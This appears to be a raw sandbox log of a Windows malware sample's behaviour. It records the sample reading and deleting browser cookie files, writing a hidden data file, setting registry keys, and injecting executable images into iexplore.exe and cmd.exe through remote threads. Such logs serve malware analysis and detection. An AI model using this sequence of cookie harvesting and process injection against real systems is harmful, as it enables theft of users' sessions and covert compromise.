File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[1].txt Offset: none Length: 115 Value: 55 49 44 0A 32 39 30 36 32 66 37 32 2D 39 35 2E 31 30 30 2E 32 34 39 2E 31 33 30 2D 31 33 30 32 33 34 30 35 30 36 0A 73 63 6F 72 65 63 61 72 64 72 65 73 65 61 72 63 68 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 34 30 31 38 39 36 37 30 34 0A 33 30 32 39 31 30 30 31 0A 32 36 36 30 35 39 31 success or wait 2633954791
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633956642
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633959145
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[2].txt Offset: none Length: 113 Value: 55 49 44 0A 31 61 37 62 62 64 63 38 2D 32 31 32 2E 32 34 33 2E 31 35 32 2E 31 36 30 2D 31 33 30 32 32 37 39 32 33 30 0A 73 63 6F 72 65 63 61 72 64 72 65 73 65 61 72 63 68 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 37 37 32 35 32 37 33 36 0A 33 30 32 39 30 38 35 39 0A 33 32 37 37 31 37 36 33 success or wait 2633959577
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[4].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633961611
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633965583
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[4].txt Offset: none Length: 205 Value: 55 49 44 0A 39 35 64 64 64 30 65 2D 36 39 2E 32 32 2E 31 33 38 2E 31 33 39 2D 31 33 32 32 37 37 33 32 36 34 0A 73 63 6F 72 65 63 61 72 64 72 65 73 65 61 72 63 68 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 36 38 31 39 35 36 33 35 32 0A 33 30 33 33 36 35 36 33 0A 32 35 30 35 36 34 33 35 38 success or wait 2633966010
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@twitter[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633969283
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633971753
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@twitter[1].txt Offset: none Length: 96 Value: 70 69 64 0A 76 31 25 33 41 31 33 32 32 37 37 32 31 33 31 39 31 39 32 36 31 38 33 32 34 34 30 0A 74 77 69 74 74 65 72 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 37 35 32 0A 35 35 38 36 33 36 38 30 0A 33 30 33 33 38 36 37 30 0A 33 30 31 34 32 33 33 35 38 34 0A 33 30 31 39 31 37 32 31 0A 2A 0A success or wait 2633972178
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@wemfbox[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633974055
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633976822
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@wemfbox[2].txt Offset: none Length: 90 Value: 69 30 30 0A 37 35 34 39 34 64 39 66 33 34 33 64 32 64 62 36 30 30 30 31 0A 77 65 6D 66 62 6F 78 2E 63 68 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 33 38 31 32 32 32 30 30 33 32 0A 33 30 32 39 30 38 35 38 0A 34 30 38 30 36 35 34 39 32 38 0A 33 30 31 34 34 30 30 37 0A 2A 0A success or wait 2633977247
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[1].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633979132
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633981624
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[1].txt Offset: none Length: 111 Value: 53 52 43 48 55 49 44 0A 56 3D 32 26 47 55 49 44 3D 34 45 46 44 37 36 44 38 33 37 43 33 34 42 31 43 39 37 44 44 42 30 38 41 36 44 46 37 30 44 45 43 0A 77 77 77 2E 62 69 6E 67 2E 63 6F 6D 2F 0A 31 35 33 36 0A 33 38 35 32 32 32 30 30 33 32 0A 33 30 32 39 30 38 35 38 0A 34 30 39 38 31 35 34 39 32 38 0A success or wait 2633982056
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633983859
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633987005
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[2].txt Offset: none Length: 117 Value: 53 52 43 48 55 49 44 0A 56 3D 32 26 47 55 49 44 3D 42 42 35 44 31 42 30 35 36 35 30 34 34 41 45 43 42 37 45 44 41 35 35 38 37 30 44 39 39 38 39 34 0A 77 77 77 2E 62 69 6E 67 2E 63 6F 6D 2F 0A 32 31 34 37 34 38 34 36 37 32 0A 32 35 36 32 36 33 35 32 36 34 0A 33 30 32 39 39 38 39 31 0A 32 33 35 38 35 success or wait 2633987374
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@www.msn[2].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633990410
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633992900
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@www.msn[2].txt Offset: none Length: 229 Value: 65 78 70 61 63 0A 33 36 30 49 49 33 62 33 39 5F 31 31 30 32 3A 54 31 7E 34 30 49 49 33 61 33 39 5F 30 38 30 33 3A 57 50 31 30 5F 32 7C 0A 77 77 77 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 32 34 0A 33 32 30 34 36 36 35 39 38 34 0A 33 30 31 39 32 33 32 31 0A 32 31 32 32 33 32 37 33 36 30 0A 33 30 31 39 31 success or wait 2633993436
File opened Path: C:\Documents and Settings\Administrator\Cookies\administrator@www.msn[3].txt Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2633995561
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F40000 Length: 2AFE848 Allocation Type: null Protection: page read and write success or wait 2633998333
File read Path: C:\Documents and Settings\Administrator\Cookies\administrator@www.msn[3].txt Offset: none Length: 211 Value: 63 62 63 0A 53 57 50 32 32 3A 62 61 6E 3A 31 33 32 35 33 36 34 2C 73 75 62 69 6E 74 3A 31 3A 31 33 32 32 38 35 38 34 38 2C 64 69 73 70 63 6F 75 6E 74 3A 31 3A 31 33 32 33 31 31 37 36 38 0A 77 77 77 2E 6D 73 6E 2E 63 6F 6D 2F 0A 31 30 38 38 0A 32 32 35 32 36 35 38 36 38 38 0A 33 30 33 33 38 35 37 32 success or wait 2633998765
Mutant created Name: \BaseNamedObjects\Global\{642AE024-5E58-D5CF-FB56-FD56EA1DDE44} success or wait 2634006892
Privilege adjusted Privilege: Security On or off: on success or wait 2634021321
File created Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2634027121
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi success or wait 2634029254
Section loaded Path: C:\WINDOWS\system32\rsaenh.dll Access: query and read Type: commit Baseaddress: 2B00000 Size: 208896 Protection: readonly Mapped to pid: own pid success or wait 2634040321
Section loaded Path: C:\WINDOWS\system32\rsaenh.dll Access: query and read Type: commit Baseaddress: 2B00000 Size: 208896 Protection: readonly Mapped to pid: own pid success or wait 2634044266
Section loaded Path: \KnownDlls\rsaenh.dll Access: write and read and execute Type: unknown Baseaddress: 2B00000 Size: 208896 Protection: readonly Mapped to pid: own pid object name not found 2635235713
Section loaded Path: C:\WINDOWS\system32\rsaenh.dll Access: query and write and read and execute Type: image Baseaddress: 68000000 Size: 221184 Protection: read write Mapped to pid: own pid success or wait 2635242136
Section loaded Path: C:\WINDOWS\system32\rsaenh.dll Access: query and read Type: commit Baseaddress: 2B00000 Size: 208896 Protection: readonly Mapped to pid: own pid success or wait 2635295427
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi success or wait 2635857737
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi success or wait 2635858142
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi success or wait 2635858419
File write Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi Offset: none Length: 5 Value: EE BB DE 55 00 success or wait 2635858692
File write Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi Offset: none Length: 4099 Value: 6F DD 26 BE 4C C1 4E 3F BE 2B 91 B4 8E 98 0F 2F E4 BB FE 5C 48 7B EA 9A 49 C9 0D 0B 21 4A 05 9D 73 2A A0 0A 6C D4 79 CD 75 A8 18 18 09 41 E5 AA AA 1F 1D 75 D6 51 CB 6A CB AC C2 C5 D1 1B 24 73 8C B2 0A 1D 43 F7 9C 9B 67 44 8D D5 59 3E 1C A1 79 19 A0 B9 29 C0 7C FA 8A 60 C3 8F BC DE B6 20 7A 39 6B 47 success or wait 2635864948
File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi success or wait 2635945891
File other operation Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt success or wait 2635955252
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt success or wait 2635957151
File other operation Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\Documents and Settings\Administrator\Cookies\administrator@addthis[1].txt success or wait 2635960976
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@addthis[1].txt success or wait 2635998857
File other operation Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt success or wait 2636002749
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt success or wait 2636004695
File other operation Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt success or wait 2636007054
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt success or wait 2636008970
File other operation Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt success or wait 2636011311
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt success or wait 2636013217
File other operation Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt success or wait 2636016481
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt success or wait 2636018395
File other operation Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt success or wait 2636020676
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt success or wait 2636022704
File other operation Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[4].txt success or wait 2636024976
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[4].txt success or wait 2636026881
File other operation Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt success or wait 2636029153
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt success or wait 2636032261
File other operation Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[3].txt success or wait 2636034651
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[3].txt success or wait 2636036747
File other operation Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[4].txt success or wait 2636039281
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@bing[4].txt success or wait 2636041185
File other operation Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.atdmt[2].txt success or wait 2636043466
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.atdmt[2].txt success or wait 2636045373
File other operation Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.atdmt[3].txt success or wait 2636047727
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.atdmt[3].txt success or wait 2636049638
File other operation Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt success or wait 2636051914
File deleted Path: C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt success or wait 2636053821
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 15807505 Type: Dword Data: -1521036859 success or wait 2636204500
System info queried Type: ProcessInformation success or wait 2650824955
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2650832182
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-215D-B06D3016937F} success or wait 2650834673
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-6D5C-B06D7C17937F} success or wait 2650835712
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-055F-B06D1414937F} success or wait 2650836648
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-455F-B06D5414937F} success or wait 2650837551
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-8D5F-B06D9C14937F} success or wait 2650838453
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-915F-B06D8014937F} success or wait 2650839354
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-595E-B06D4815937F} success or wait 2650840315
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-F15E-B06DE015937F} success or wait 2650841265
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-0959-B06D1812937F} success or wait 2650842192
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-4D59-B06D5C12937F} success or wait 2650843141
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-D159-B06DC012937F} success or wait 2650844074
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-AD5B-B06DBC10937F} success or wait 2650845414
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-DD5D-B06DCC16937F} success or wait 2650846429
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-AD5C-B06DBC17937F} success or wait 2650847356
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-D95B-B06DC810937F} object name exists 2650848307
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-615A-B06D7011937F} object name exists 2650849149
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-7D5A-B06D6C11937F} success or wait 2650849986
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-555B-B06D4410937F} success or wait 2650850910
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-955B-B06D8410937F} success or wait 2650852279
Memory allocated PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 8000000 Length: 2A7FCC8 Allocation Type: null Protection: page execute and read and write success or wait 2650853088
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 8000000 Length: 217088 Value: 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 success or wait 2650876794
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 80301F0 Length: 4 Value: 00 00 00 00 success or wait 2650895173
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 8030204 Length: 4 Value: 00 00 00 08 success or wait 2650910013
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 80306C8 Length: 4 Value: B8 03 00 00 success or wait 2650924267
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 80306CC Length: 4 Value: B8 0A 00 00 success or wait 2650938110
System info queried Type: ProcessInformation success or wait 2650939920
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2650946933
Thread created PID: 1712 TID: 1956 EIP: 7C8106F9 Imagepath: C:\Program Files\Internet Explorer\iexplore.exe Injected: true success or wait 2651100515
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-E15B-B06DF010937F} object name exists 2666940405
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-615F-B06D7014937F} success or wait 2666943457
Memory allocated PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 2E70000 Length: 2A7FCC8 Allocation Type: null Protection: page execute and read and write success or wait 2666943987
Memory written PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 2E70000 Length: 217088 Value: 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 success or wait 2666984746
Memory written PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 2EA01F0 Length: 4 Value: 00 00 00 00 success or wait 2667050522
Memory written PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 2EA0204 Length: 4 Value: 00 00 E7 02 success or wait 2667145785
Memory written PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 2EA06C8 Length: 4 Value: 54 0F 00 00 success or wait 2667191007
Memory written PID: 580 Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Base: 2EA06CC Length: 4 Value: 3C 0F 00 00 success or wait 2667376259
System info queried Type: ProcessInformation success or wait 2667506927
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2668292295
Thread created PID: 580 TID: 2552 EIP: 7C8106F9 Imagepath: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Injected: true success or wait 2786559593
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 2af72gde object name not found 2786680710
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 2f6gb30c object name not found 2786687791
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: 2feg2i1d object name not found 2786797150
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-CD5C-B06DDC17937F} success or wait 2787382969
Memory allocated PID: 488 Path: C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe Base: 0 Length: 2A7FCC8 Allocation Type: null Protection: page execute and read and write process is terminating 2787391468
System info queried Type: ProcessInformation success or wait 2787391864
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2787394419
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-215D-B06D3016937F} success or wait 2787419662
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-6D5C-B06D7C17937F} success or wait 2787473593
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-055F-B06D1414937F} success or wait 2787473990
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-455F-B06D5414937F} success or wait 2787474444
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-8D5F-B06D9C14937F} success or wait 2787474779
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-915F-B06D8014937F} success or wait 2787475110
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-595E-B06D4815937F} success or wait 2787475490
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-F15E-B06DE015937F} success or wait 2787475838
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-0959-B06D1812937F} success or wait 2787476191
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-4D59-B06D5C12937F} success or wait 2787476553
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: 186gef90 object name not found 2787502848
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-D159-B06DC012937F} success or wait 2787503382
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-AD5B-B06DBC10937F} success or wait 2787503882
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-DD5D-B06DCC16937F} success or wait 2787504305
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-AD5C-B06DBC17937F} success or wait 2787504689
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-D95B-B06DC810937F} object name exists 2787505039
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-615A-B06D7011937F} object name exists 2787505359
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-7D5A-B06D6C11937F} success or wait 2787505664
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-555B-B06D4410937F} success or wait 2787506029
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-E15B-B06DF010937F} object name exists 2787506736
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-4D55-B06D5C1E937F} success or wait 2787507190
Memory allocated PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 150000 Length: 2A7FCC8 Allocation Type: null Protection: page execute and read and write success or wait 2787507380
Memory written PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 150000 Length: 217088 Value: 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 success or wait 2787630526
Section loaded Path: C:\WINDOWS\system32\hnetcfg.dll Access: write and read and execute Type: commit Baseaddress: 2900000 Size: 344064 Protection: execute Mapped to pid: own pid success or wait 2787636472
Section loaded Path: C:\WINDOWS\system32\hnetcfg.dll Access: write and read and execute Type: commit Baseaddress: 2900000 Size: 344064 Protection: execute Mapped to pid: own pid success or wait 2787647593
Section loaded Path: C:\WINDOWS\system32\hnetcfg.dll Access: query and write and read and execute Type: image Baseaddress: 662B0000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 2787661574
Memory written PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 1801F0 Length: 4 Value: 00 00 00 00 success or wait 2787719533
Memory written PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 180204 Length: 4 Value: 00 00 15 00 success or wait 2787750914
Memory written PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 1806C8 Length: 4 Value: 10 00 00 00 success or wait 2817820927
Memory written PID: 2152 Path: C:\WINDOWS\system32\cmd.exe Base: 1806CC Length: 4 Value: 24 00 00 00 success or wait 2818038131
System info queried Type: ProcessInformation success or wait 2818045238
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2818052059
